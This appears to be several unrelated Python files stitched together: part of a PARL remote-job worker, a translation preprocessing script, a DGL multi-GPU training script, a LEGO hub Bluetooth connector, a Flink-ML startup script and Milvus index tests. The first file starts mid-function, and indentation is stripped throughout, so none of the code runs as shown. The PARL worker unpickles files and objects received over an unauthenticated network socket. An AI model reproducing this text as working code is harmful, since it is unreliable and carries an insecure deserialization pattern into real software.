"""Create a socket server that will raises timeout exception.
"""
heartbeat_socket = self.ctx.socket(zmq.REP)
if timeout:
heartbeat_socket.setsockopt(
zmq.RCVTIMEO, remote_constants.HEARTBEAT_RCVTIMEO_S * 1000)
heartbeat_socket.linger = 0
heartbeat_port = heartbeat_socket.bind_to_random_port(addr="tcp://*")
heartbeat_address = "{}:{}".format(self.job_ip, heartbeat_port)
return heartbeat_socket, heartbeat_address
def _reply_client_heartbeat(self, socket):
"""Create a socket that replies heartbeat signals from the client.
If the job losts connection with the client, it will exit too.
"""
while True:
try:
message = socket.recv_multipart()
stop_job = self._check_used_memory()
socket.send_multipart([
remote_constants.HEARTBEAT_TAG,
to_byte(str(stop_job)),
to_byte(self.job_address)
])
if stop_job == True:
logger.error(
"Memory used by this job exceeds {}. This job will exist."
.format(self.max_memory))
time.sleep(5)
socket.close(0)
os._exit(1)
except zmq.error.Again as e:
logger.warning(
"[Job] Cannot connect to the client. This job will exit and inform the worker."
)
break
socket.close(0)
with self.lock:
self.kill_job_socket.send_multipart(
[remote_constants.KILLJOB_TAG,
to_byte(self.job_address)])
try:
_ = self.kill_job_socket.recv_multipart()
except zmq.error.Again as e:
pass
logger.warning("[Job]lost connection with the client, will exit")
os._exit(1)
def _reply_worker_heartbeat(self, socket):
"""create a socket that replies heartbeat signals from the worker.
If the worker has exited, the job will exit automatically.
"""
while True:
try:
message = socket.recv_multipart()
socket.send_multipart([remote_constants.HEARTBEAT_TAG])
except zmq.error.Again as e:
logger.warning("[Job] Cannot connect to the worker{}. ".format(
self.worker_address) + "Job will quit.")
break
socket.close(0)
os._exit(1)
def wait_for_files(self, reply_socket, job_address):
"""Wait for python files from remote object.
When a remote object receives the allocated job address, it will send
the python files to the job. Later, the job will save these files to a
temporary directory and add the temporary diretory to Python's working
directory.
Args:
reply_socket (sockert): main socket to accept commands of remote object.
job_address (String): address of reply_socket.
Returns:
A temporary directory containing the python files.
"""
message = reply_socket.recv_multipart()
tag = message[0]
if tag == remote_constants.SEND_FILE_TAG:
pyfiles = pickle.loads(message[1])
# save python files to temporary directory
envdir = tempfile.mkdtemp()
for file, code in pyfiles['python_files'].items():
file = os.path.join(envdir, file)
with open(file, 'wb') as code_file:
code_file.write(code)
# save other files to current directory
for file, content in pyfiles['other_files'].items():
# create directory (i.e. ./rom_files/)
if '/' in file:
try:
sep = os.sep
recursive_dirs = os.path.join(*(file.split(sep)[:-1]))
recursive_dirs = os.path.join(envdir, recursive_dirs)
os.makedirs(recursive_dirs)
except OSError as e:
pass
file = os.path.join(envdir, file)
with open(file, 'wb') as f:
f.write(content)
reply_socket.send_multipart([remote_constants.NORMAL_TAG])
return envdir
else:
logger.error("NotImplementedError:{}, received tag:{}".format(
job_address, ))
raise NotImplementedError
def wait_for_connection(self, reply_socket):
"""Wait for connection from the remote object.
The remote object will send its class information and initialization
arguments to the job, these parameters are then used to create a
local instance in the job process.
Args:
reply_socket (sockert): main socket to accept commands of remote object.
Returns:
A local instance of the remote class object.
"""
message = reply_socket.recv_multipart()
tag = message[0]
obj = None
if tag == remote_constants.INIT_OBJECT_TAG:
try:
file_name, class_name, end_of_file = cloudpickle.loads(
message[1])
cls = load_remote_class(file_name, class_name, end_of_file)
args, kwargs = cloudpickle.loads(message[2])
logfile_path = os.path.join(self.log_dir, 'stdout.log')
with redirect_stdout_to_file(logfile_path):
obj = cls(*args, **kwargs)
except Exception as e:
traceback_str = str(traceback.format_exc())
error_str = str(e)
logger.error("traceback:\n{}".format(traceback_str))
reply_socket.send_multipart([
remote_constants.EXCEPTION_TAG,
to_byte(error_str + "\ntraceback:\n" + traceback_str)
])
return None
reply_socket.send_multipart([remote_constants.NORMAL_TAG])
else:
logger.error("Message from job {}".format(message))
reply_socket.send_multipart([
remote_constants.EXCEPTION_TAG,
b"[job]Unkonwn tag when tried to receive the class definition"
])
raise NotImplementedError
return obj
def run(self, job_address_sender, job_id_sender):
"""An infinite loop waiting for a new task.
Args:
job_address_sender(sending end of multiprocessing.Pipe): send job address of reply_socket to main process.
"""
ctx = zmq.Context()
# create the reply_socket
reply_socket = ctx.socket(zmq.REP)
job_port = reply_socket.bind_to_random_port(addr="tcp://*")
reply_socket.linger = 0
job_ip = get_ip_address()
job_address = "{}:{}".format(job_ip, job_port)
job_id = job_address.replace(':', '_') + '_' + str(int(time.time()))
self.log_dir = os.path.expanduser('~/.parl_data/job/{}'.format(job_id))
logger.set_dir(self.log_dir)
logger.info(
"[Job] Job {} initialized. Reply heartbeat socket Address: {}.".
format(job_id, job_address))
job_address_sender.send(job_address)
job_id_sender.send(job_id)
try:
# receive source code from the actor and append them to the environment variables.
envdir = self.wait_for_files(reply_socket, job_address)
sys.path.insert(0, envdir)
os.chdir(envdir)
obj = self.wait_for_connection(reply_socket)
assert obj is not None
self.single_task(obj, reply_socket, job_address)
except Exception as e:
logger.error(
"Error occurs when running a single task. We will reset this job. \nReason:{}"
.format(e))
traceback_str = str(traceback.format_exc())
logger.error("traceback:\n{}".format(traceback_str))
def single_task(self, obj, reply_socket, job_address):
"""An infinite loop waiting for commands from the remote object.
Each job will receive two kinds of message from the remote object:
1. When the remote object calls a function, job will run the
function on the local instance and return the results to the
remote object.
2. When the remote object is deleted, the job will quit and release
related computation resources.
Args:
reply_socket (sockert): main socket to accept commands of remote object.
job_address (String): address of reply_socket.
"""
while True:
message = reply_socket.recv_multipart()
tag = message[0]
if tag in [
remote_constants.CALL_TAG, remote_constants.GET_ATTRIBUTE,
remote_constants.SET_ATTRIBUTE,
remote_constants.CHECK_ATTRIBUTE
]:
try:
if tag == remote_constants.CHECK_ATTRIBUTE:
attr = to_str(message[1])
if attr in obj.__dict__:
reply_socket.send_multipart([
remote_constants.NORMAL_TAG,
dumps_return(True)
])
else:
reply_socket.send_multipart([
remote_constants.NORMAL_TAG,
dumps_return(False)
])
elif tag == remote_constants.CALL_TAG:
function_name = to_str(message[1])
data = message[2]
args, kwargs = loads_argument(data)
# Redirect stdout to stdout.log temporarily
logfile_path = os.path.join(self.log_dir, 'stdout.log')
with redirect_stdout_to_file(logfile_path):
ret = getattr(obj, function_name)(*args, **kwargs)
ret = dumps_return(ret)
reply_socket.send_multipart(
[remote_constants.NORMAL_TAG, ret])
elif tag == remote_constants.GET_ATTRIBUTE:
attribute_name = to_str(message[1])
logfile_path = os.path.join(self.log_dir, 'stdout.log')
with redirect_stdout_to_file(logfile_path):
ret = getattr(obj, attribute_name)
ret = dumps_return(ret)
reply_socket.send_multipart(
[remote_constants.NORMAL_TAG, ret])
elif tag == remote_constants.SET_ATTRIBUTE:
attribute_name = to_str(message[1])
attribute_value = loads_return(message[2])
logfile_path = os.path.join(self.log_dir, 'stdout.log')
with redirect_stdout_to_file(logfile_path):
setattr(obj, attribute_name, attribute_value)
reply_socket.send_multipart(
[remote_constants.NORMAL_TAG])
else:
pass
except Exception as e:
# reset the job
error_str = str(e)
logger.error(error_str)
if type(e) == AttributeError:
reply_socket.send_multipart([
remote_constants.ATTRIBUTE_EXCEPTION_TAG,
to_byte(error_str)
])
raise AttributeError
elif type(e) == SerializeError:
reply_socket.send_multipart([
remote_constants.SERIALIZE_EXCEPTION_TAG,
to_byte(error_str)
])
raise SerializeError
elif type(e) == DeserializeError:
reply_socket.send_multipart([
remote_constants.DESERIALIZE_EXCEPTION_TAG,
to_byte(error_str)
])
raise DeserializeError
else:
traceback_str = str(traceback.format_exc())
logger.error("traceback:\n{}".format(traceback_str))
reply_socket.send_multipart([
remote_constants.EXCEPTION_TAG,
to_byte(error_str + "\ntraceback:\n" +
traceback_str)
])
break
# receive DELETE_TAG from actor, and stop replying worker heartbeat
elif tag == remote_constants.KILLJOB_TAG:
reply_socket.send_multipart([remote_constants.NORMAL_TAG])
logger.warning("An actor exits and this job {} will exit.".
format(job_address))
break
else:
logger.error(
"The job receives an unknown message: {}".format(message))
raise NotImplementedError
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--worker_address", required=True, type=str, help="worker_address")
parser.add_argument(
"--log_server_address",
required=True,
type=str,
help="log_server_address, address of the log web server on worker")
args = parser.parse_args()
job = Job(args.worker_address, args.log_server_address)
|
pangeamt_files_preprocess.py
|
#!/usr/bin/env python
import os
import json
import argparse
from multiprocessing import Process
from pangeamt_nlp.processors import Pipeline
# Parallel preprocess of train, dev and test files.
def _get_parser():
parser = argparse.ArgumentParser(description='Preprocess file.')
parser.add_argument('config', help="Path to config file")
parser.add_argument('data', help="Path to data folder")
parser.add_argument('src', help='Src lang')
parser.add_argument('tgt', help='Tgt lang')
return parser
def _load_pipelines(config, src_lang, tgt_lang):
# Loads the main config for the source files and the secondary config
# for the target files
with open(config, 'r') as config_file:
config = json.load(config_file)
print('Loading pipelines..')
pipelines = {
src_lang:\
Pipeline(config['pipeline_config'], config['src_lang'],\
config['tgt_lang']),
tgt_lang:\
Pipeline(config['pipeline_config_tgt'], config['tgt_lang'])
}
print('Pipelines loaded..')
return pipelines
def _process(lang, pipelines):
pipeline = pipelines[lang]
files = ['train', 'dev', 'test']
for file in files:
path = f'{args.data}/{file}.{lang}'
# Checks if the file exists
if os.path.isfile(path):
print(f"Started processing {path.split('/')[-1]}")
pipeline.preprocess_file(path)
print(f"Finished processing {path.split('/')[-1]}")
else:
pass
def main(args):
langs = [args.src, args.tgt]
to_join = []
# loads the pipelines
pipelines = _load_pipelines(args.config, args.src, args.tgt)
for lang in langs:
# Creates and spawns a process to parallelise the preprocess
p = Process(target=_process, args=(lang, pipelines,))
p.start()
to_join.append(p)
# Waits for all the processes to finish
for p in to_join:
p.join()
if __name__ == "__main__":
parser = _get_parser()
args = parser.parse_args()
os.chdir(os.path.dirname(os.path.realpath(args.config)))
main(args)
|
train_sampling_multi_gpu.py
|
import dgl
import numpy as np
import torch as th
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import dgl.multiprocessing as mp
import dgl.nn.pytorch as dglnn
import time
import math
import argparse
from torch.nn.parallel import DistributedDataParallel
import tqdm
from model import SAGE
from load_graph import load_reddit, inductive_split
def compute_acc(pred, labels):
"""
Compute the accuracy of prediction given the labels.
"""
return (th.argmax(pred, dim=1) == labels).float().sum() / len(pred)
def evaluate(model, g, nfeat, labels, val_nid, device):
"""
Evaluate the model on the validation set specified by ``val_nid``.
g : The entire graph.
inputs : The features of all the nodes.
labels : The labels of all the nodes.
val_nid : A node ID tensor indicating which nodes do we actually compute the accuracy for.
device : The GPU device to evaluate on.
"""
model.eval()
with th.no_grad():
pred = model.inference(g, nfeat, device, args.batch_size, args.num_workers)
model.train()
return compute_acc(pred[val_nid], labels[val_nid])
def load_subtensor(nfeat, labels, seeds, input_nodes, dev_id):
"""
Extracts features and labels for a subset of nodes.
"""
batch_inputs = nfeat[input_nodes].to(dev_id)
batch_labels = labels[seeds].to(dev_id)
return batch_inputs, batch_labels
#### Entry point
def run(proc_id, n_gpus, args, devices, data):
# Start up distributed training, if enabled.
dev_id = devices[proc_id]
if n_gpus > 1:
dist_init_method = 'tcp://{master_ip}:{master_port}'.format(
master_ip='127.0.0.1', master_port='12345')
world_size = n_gpus
th.distributed.init_process_group(backend="nccl",
init_method=dist_init_method,
world_size=world_size,
rank=proc_id)
th.cuda.set_device(dev_id)
# Unpack data
n_classes, train_g, val_g, test_g = data
if args.inductive:
train_nfeat = train_g.ndata.pop('features')
val_nfeat = val_g.ndata.pop('features')
test_nfeat = test_g.ndata.pop('features')
train_labels = train_g.ndata.pop('labels')
val_labels = val_g.ndata.pop('labels')
test_labels = test_g.ndata.pop('labels')
else:
train_nfeat = val_nfeat = test_nfeat = g.ndata.pop('features')
train_labels = val_labels = test_labels = g.ndata.pop('labels')
if not args.data_cpu:
train_nfeat = train_nfeat.to(dev_id)
train_labels = train_labels.to(dev_id)
in_feats = train_nfeat.shape[1]
train_mask = train_g.ndata['train_mask']
val_mask = val_g.ndata['val_mask']
test_mask = ~(test_g.ndata['train_mask'] | test_g.ndata['val_mask'])
train_nid = train_mask.nonzero().squeeze()
val_nid = val_mask.nonzero().squeeze()
test_nid = test_mask.nonzero().squeeze()
train_nid = train_nid[:n_gpus * args.batch_size + 1]
# Create PyTorch DataLoader for constructing blocks
sampler = dgl.dataloading.MultiLayerNeighborSampler(
[int(fanout) for fanout in args.fan_out.split(',')])
dataloader = dgl.dataloading.NodeDataLoader(
train_g,
train_nid,
sampler,
use_ddp=n_gpus > 1,
batch_size=args.batch_size,
shuffle=True,
drop_last=False,
num_workers=args.num_workers)
# Define model and optimizer
model = SAGE(in_feats, args.num_hidden, n_classes, args.num_layers, F.relu, args.dropout)
model = model.to(dev_id)
if n_gpus > 1:
model = DistributedDataParallel(model, device_ids=[dev_id], output_device=dev_id)
loss_fcn = nn.CrossEntropyLoss()
optimizer = optim.Adam(model.parameters(), lr=args.lr)
# Training loop
avg = 0
iter_tput = []
for epoch in range(args.num_epochs):
if n_gpus > 1:
dataloader.set_epoch(epoch)
tic = time.time()
# Loop over the dataloader to sample the computation dependency graph as a list of
# blocks.
for step, (input_nodes, seeds, blocks) in enumerate(dataloader):
if proc_id == 0:
tic_step = time.time()
# Load the input features as well as output labels
batch_inputs, batch_labels = load_subtensor(train_nfeat, train_labels,
seeds, input_nodes, dev_id)
blocks = [block.int().to(dev_id) for block in blocks]
# Compute loss and prediction
batch_pred = model(blocks, batch_inputs)
loss = loss_fcn(batch_pred, batch_labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
if proc_id == 0:
iter_tput.append(len(seeds) * n_gpus / (time.time() - tic_step))
if step % args.log_every == 0 and proc_id == 0:
acc = compute_acc(batch_pred, batch_labels)
print('Epoch {:05d} | Step {:05d} | Loss {:.4f} | Train Acc {:.4f} | Speed (samples/sec) {:.4f} | GPU {:.1f} MB'.format(
epoch, step, loss.item(), acc.item(), np.mean(iter_tput[3:]), th.cuda.max_memory_allocated() / 1000000))
if n_gpus > 1:
th.distributed.barrier()
toc = time.time()
if proc_id == 0:
print('Epoch Time(s): {:.4f}'.format(toc - tic))
if epoch >= 5:
avg += toc - tic
if epoch % args.eval_every == 0 and epoch != 0:
if n_gpus == 1:
eval_acc = evaluate(
model, val_g, val_nfeat, val_labels, val_nid, devices[0])
test_acc = evaluate(
model, test_g, test_nfeat, test_labels, test_nid, devices[0])
else:
eval_acc = evaluate(
model.module, val_g, val_nfeat, val_labels, val_nid, devices[0])
test_acc = evaluate(
model.module, test_g, test_nfeat, test_labels, test_nid, devices[0])
print('Eval Acc {:.4f}'.format(eval_acc))
print('Test Acc: {:.4f}'.format(test_acc))
if n_gpus > 1:
th.distributed.barrier()
if proc_id == 0:
print('Avg epoch time: {}'.format(avg / (epoch - 4)))
if __name__ == '__main__':
argparser = argparse.ArgumentParser("multi-gpu training")
argparser.add_argument('--gpu', type=str, default='0',
help="Comma separated list of GPU device IDs.")
argparser.add_argument('--num-epochs', type=int, default=20)
argparser.add_argument('--num-hidden', type=int, default=16)
argparser.add_argument('--num-layers', type=int, default=2)
argparser.add_argument('--fan-out', type=str, default='10,25')
argparser.add_argument('--batch-size', type=int, default=1000)
argparser.add_argument('--log-every', type=int, default=20)
argparser.add_argument('--eval-every', type=int, default=5)
argparser.add_argument('--lr', type=float, default=0.003)
argparser.add_argument('--dropout', type=float, default=0.5)
argparser.add_argument('--num-workers', type=int, default=0,
help="Number of sampling processes. Use 0 for no extra process.")
argparser.add_argument('--inductive', action='store_true',
help="Inductive learning setting")
argparser.add_argument('--data-cpu', action='store_true',
help="By default the script puts all node features and labels "
"on GPU when using it to save time for data copy. This may "
"be undesired if they cannot fit in GPU memory at once. "
"This flag disables that.")
args = argparser.parse_args()
devices = list(map(int, args.gpu.split(',')))
n_gpus = len(devices)
g, n_classes = load_reddit()
# Construct graph
g = dgl.as_heterograph(g)
if args.inductive:
train_g, val_g, test_g = inductive_split(g)
else:
train_g = val_g = test_g = g
# Create csr/coo/csc formats before launching training processes with multi-gpu.
# This avoids creating certain formats in each sub-process, which saves momory and CPU.
train_g.create_formats_()
val_g.create_formats_()
test_g.create_formats_()
# Pack data
data = n_classes, train_g, val_g, test_g
if n_gpus == 1:
run(0, n_gpus, args, devices, data)
else:
procs = []
for proc_id in range(n_gpus):
p = mp.Process(target=run, args=(proc_id, n_gpus, args, devices, data))
p.start()
procs.append(p)
for p in procs:
p.join()
|
cgatt.py
|
import logging
import re
import threading
from time import sleep
import gatt
from pylgbst.comms import Connection, LEGO_MOVE_HUB, MOVE_HUB_HW_UUID_SERV, MOVE_HUB_HW_UUID_CHAR, \
MOVE_HUB_HARDWARE_HANDLE
from pylgbst.utilities import str2hex
log = logging.getLogger('comms-gatt')
class CustomDevice(gatt.Device, object):
def __init__(self, mac_address, manager):
gatt.Device.__init__(self, mac_address=mac_address, manager=manager)
self._notify_callback = lambda hnd, val: None
self._handle = None
def connect(self):
gatt.Device.connect(self)
log.info("Waiting for device connection...")
while self._handle is None:
log.debug("Sleeping...")
sleep(1)
if isinstance(self._handle, BaseException):
exc = self._handle
self._handle = None
raise exc
def write(self, data):
log.debug("Writing to handle: %s", str2hex(data))
return self._handle.write_value(data)
def enable_notifications(self):
log.debug('Enable Notifications...')
self._handle.enable_notifications()
def set_notific_handler(self, func_hnd):
self._notify_callback = func_hnd
def services_resolved(self):
log.debug('Getting MoveHub services and characteristics...')
gatt.Device.services_resolved(self)
log.debug("[%s] Resolved services", self.mac_address)
for service in self.services:
log.debug("[%s] Service [%s]", self.mac_address, service.uuid)
for characteristic in service.characteristics:
log.debug("[%s] Characteristic [%s]", self.mac_address, characteristic.uuid)
if service.uuid == MOVE_HUB_HW_UUID_SERV and characteristic.uuid == MOVE_HUB_HW_UUID_CHAR:
log.debug('MoveHub characteristic found')
self._handle = characteristic
if self._handle is None:
self.manager.stop()
self._handle = RuntimeError("Failed to obtain MoveHub handle")
def characteristic_value_updated(self, characteristic, value):
value = self._fix_weird_bug(value)
log.debug('Notification in GattDevice: %s', str2hex(value))
self._notify_callback(MOVE_HUB_HARDWARE_HANDLE, value)
def _fix_weird_bug(self, value):
if isinstance(value, str) and "dbus.Array" in value: # weird bug from gatt on my Ubuntu 16.04!
log.debug("Fixing broken notify string: %s", value)
return ''.join([chr(int(x.group(1))) for x in re.finditer(r"dbus.Byte\((\d+)\)", value)])
return value
class GattConnection(Connection):
"""
:type _device: CustomDevice
"""
def __init__(self, bt_iface_name='hci0'):
super(GattConnection, self).__init__()
self._device = None
self._iface = bt_iface_name
try:
self._manager = gatt.DeviceManager(adapter_name=self._iface)
except TypeError:
raise NotImplementedError("Gatt is not implemented for this platform")
self._manager_thread = threading.Thread(target=self._manager.run)
self._manager_thread.setDaemon(True)
log.debug('Starting DeviceManager...')
def connect(self, hub_mac=None):
self._manager_thread.start()
self._manager.start_discovery()
while not self._device:
log.info("Discovering devices...")
devices = self._manager.devices()
log.debug("Devices: %s", devices)
for dev in devices:
address = dev.mac_address
name = dev.alias()
if (not hub_mac and name == LEGO_MOVE_HUB) or hub_mac == address:
logging.info("Found %s at %s", name, address)
self._device = CustomDevice(address, self._manager)
break
if not self._device:
sleep(1)
self._device.connect()
return self
def disconnect(self):
self._manager.stop()
self._device.disconnect()
def write(self, handle, data):
self._device.write(data)
def set_notify_handler(self, handler):
self._device.set_notific_handler(handler)
def enable_notifications(self):
self._device.enable_notifications()
def is_alive(self):
return self._manager_thread.isAlive()
|
startup.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import sys
import importlib
import threading
import ctypes
import logging
import traceback
from dl_on_flink_framework import context
import grpc
from dl_on_flink_framework import node_pb2
from dl_on_flink_framework import node_service_pb2_grpc
def parse_dir_script(script_path):
index = str(script_path).rindex('/')
dir_str = script_path[0: index + 1]
script_name = script_path[index + 1: len(script_path) - 3]
return dir_str, script_name
def start_user_func(function, ml_context):
try:
function(ml_context)
except Exception as e:
logging.error(traceback.format_exc())
raise
def start_user_thread(function, ml_context):
local_t = threading.Thread(target=start_user_func, args=(function, ml_context,), name="user_thread")
local_t.setDaemon(True)
local_t.start()
return local_t
def terminate_thread(thread):
"""Terminates a python thread from another thread.
:param thread: a threading.Thread instance
"""
if not thread.isAlive():
return
exc = ctypes.py_object(SystemExit)
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(
ctypes.c_long(thread.ident), exc)
if res == 0:
raise ValueError("nonexistent thread id")
elif res > 1:
# """if it returns a number greater than one, you're in trouble,
# and you should call it again with exc=NULL to revert the effect"""
ctypes.pythonapi.PyThreadState_SetAsyncExc(thread.ident, None)
raise SystemError("PyThreadState_SetAsyncExc failed")
thread.join()
def createContext(node_address):
channel = grpc.insecure_channel(node_address)
stub = node_service_pb2_grpc.NodeServiceStub(channel)
response = stub.GetContext(node_pb2.ContextRequest(message=''))
context_proto = response.context
return context.Context(context_proto, channel)
if __name__ == "__main__":
assert len(sys.argv) == 2, 'Invalid cmd line argument ' + str(sys.argv)
print ('Running user func in process mode')
sys.stdout.flush()
address = sys.argv[1]
context = createContext(address)
# setup default logging
logging.basicConfig(level=logging.INFO,
format='%(asctime)s [' + context.identity + '-python-%(filename)s:%(lineno)d] %(levelname)s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
)
print ("########## " + context.userScript)
script_str = context.userScript
key = context.identity
func_name = context.funcName
dir_name = parse_dir_script(script_str)
sys.path.insert(0, dir_name[0])
user_py = importlib.import_module(dir_name[1])
func = getattr(user_py, func_name)
logging.info(key + ' calling user func ' + func_name)
func(context)
logging.info(key + " python run finish")
|
test_index.py
|
import pytest
from base.client_base import TestcaseBase
from base.index_wrapper import ApiIndexWrapper
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from common.code_mapping import CollectionErrorMessage as clem
from common.code_mapping import IndexErrorMessage as iem
from utils.utils import *
from common.constants import *
prefix = "index"
default_schema = cf.gen_default_collection_schema()
default_field_name = ct.default_float_vec_field_name
default_index_params = {"index_type": "IVF_SQ8", "metric_type": "L2", "params": {"nlist": 64}}
# copied from pymilvus
uid = "test_index"
BUILD_TIMEOUT = 300
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
# query = gen_search_vectors_params(field_name, default_entities, default_top_k, 1)
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
class TestIndexParams(TestcaseBase):
""" Test case of index interface """
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("collection", [None, "coll"])
def test_index_non_collection(self, collection):
"""
target: test index with None collection
method: input none collection object
expected: raise exception
"""
self._connect()
self.index_wrap.init_index(collection, default_field_name, default_index_params, check_task=CheckTasks.err_res,
check_items={ct.err_code: 0, ct.err_msg: clem.CollectionType})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("field_name", ct.get_invalid_strs)
def test_index_field_name_invalid(self, field_name):
"""
target: test index with error field name
method: input field name
expected: raise exception
"""
collection_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=collection_name)
log.error(iem.WrongFieldName % str(field_name))
self.index_wrap.init_index(collection_w.collection, field_name, default_index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: iem.WrongFieldName % str(field_name)})
@pytest.mark.tags(CaseLabel.L1)
def test_index_field_name_not_existed(self):
"""
target: test index with error field name
method: input field name not created
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
f_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
self.index_wrap.init_index(collection_w.collection, f_name, default_index_params, check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: f"cannot create index on non-existed field: {f_name}"})
@pytest.mark.tags(CaseLabel.L0)
# TODO (reason="pymilvus issue #677", raises=TypeError)
@pytest.mark.parametrize("index_type", ct.get_invalid_strs)
def test_index_type_invalid(self, index_type):
"""
target: test index with error index type
method: input invalid index type
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index_params = copy.deepcopy(default_index_params)
index_params["index_type"] = index_type
if not isinstance(index_params["index_type"], str):
msg = "must be str"
else:
msg = "Invalid index_type"
self.index_wrap.init_index(collection_w.collection, default_field_name, index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: msg})
@pytest.mark.tags(CaseLabel.L1)
def test_index_type_not_supported(self):
"""
target: test index with error index type
method: input unsupported index type
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index_params = copy.deepcopy(default_index_params)
index_params["index_type"] = "IVFFFFFFF"
self.index_wrap.init_index(collection_w.collection, default_field_name, index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
@pytest.mark.tags(CaseLabel.L1)
def test_index_params_invalid(self, get_invalid_index_params):
"""
target: test index with error index params
method: input invalid index params
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index_params = get_invalid_index_params
self.index_wrap.init_index(collection_w.collection, default_field_name, index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
# TODO: not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_name_invalid(self, get_invalid_index_name):
"""
target: test index with error index name
method: input invalid index name
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
index_name = get_invalid_index_name
collection_w = self.init_collection_wrap(name=c_name)
self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
class TestIndexOperation(TestcaseBase):
""" Test case of index interface """
@pytest.mark.tags(CaseLabel.L1)
def test_index_create_with_different_indexes(self):
"""
target: test create index on one field, with two different type of index
method: create two different indexes
expected: only latest index can be created for a collection
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
self.index_wrap.init_index(collection_w.collection, default_field_name, default_index)
assert len(collection_w.indexes) == 1
assert collection_w.indexes[0].params["index_type"] == default_index["index_type"]
@pytest.mark.tags(CaseLabel.L1)
def test_index_collection_empty(self):
"""
target: test index with empty collection
method: Index on empty collection
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
# TODO: assert index
cf.assert_equal_index(index, collection_w.collection.indexes[0])
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("index_param", [default_index_params])
def test_index_params(self, index_param):
"""
target: test index with all index type/params
method: input valid params
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
index_params = index_param
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, index_params)
# TODO: assert index
cf.assert_equal_index(index, collection_w.collection.indexes[0])
@pytest.mark.tags(CaseLabel.L1)
def test_index_params_flush(self):
"""
target: test index with all index type/params
method: input valid params
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
self._connect().flush([collection_w.name])
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
# TODO: assert index
cf.assert_equal_index(index, collection_w.collection.indexes[0])
assert collection_w.num_entities == ct.default_nb
# TODO: not support
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_name_dup(self):
"""
target: test index with duplicate index name
method: create index with existed index name create by `collection.create_index`
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
index_name = ct.default_index_name
collection_w = self.init_collection_wrap(name=c_name)
collection_w.collection.create_index(default_field_name, default_index_params, index_name=index_name)
self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_field_names(self):
"""
target: test index on one field, with two indexes
method: create index with two different indexes
expected: no exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_fields(self):
"""
target: test index on two fields, with the same name
method: create the same index name with two different fields
expected: exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_fields_B(self):
"""
target: test index on two fields, with the different name
method: create the different index with two different fields
expected: no exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_field_names_eq_maximum(self):
"""
target: test index on one field, with the different names, num of the names equal to the maximum num supported
method: create the different indexes
expected: no exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_field_names_more_maximum(self):
"""
target: test index on one field, with the different names, num of the names more than the maximum num supported
method: create the different indexes
expected: exception raised
"""
pass
@pytest.mark.tags(CaseLabel.L1)
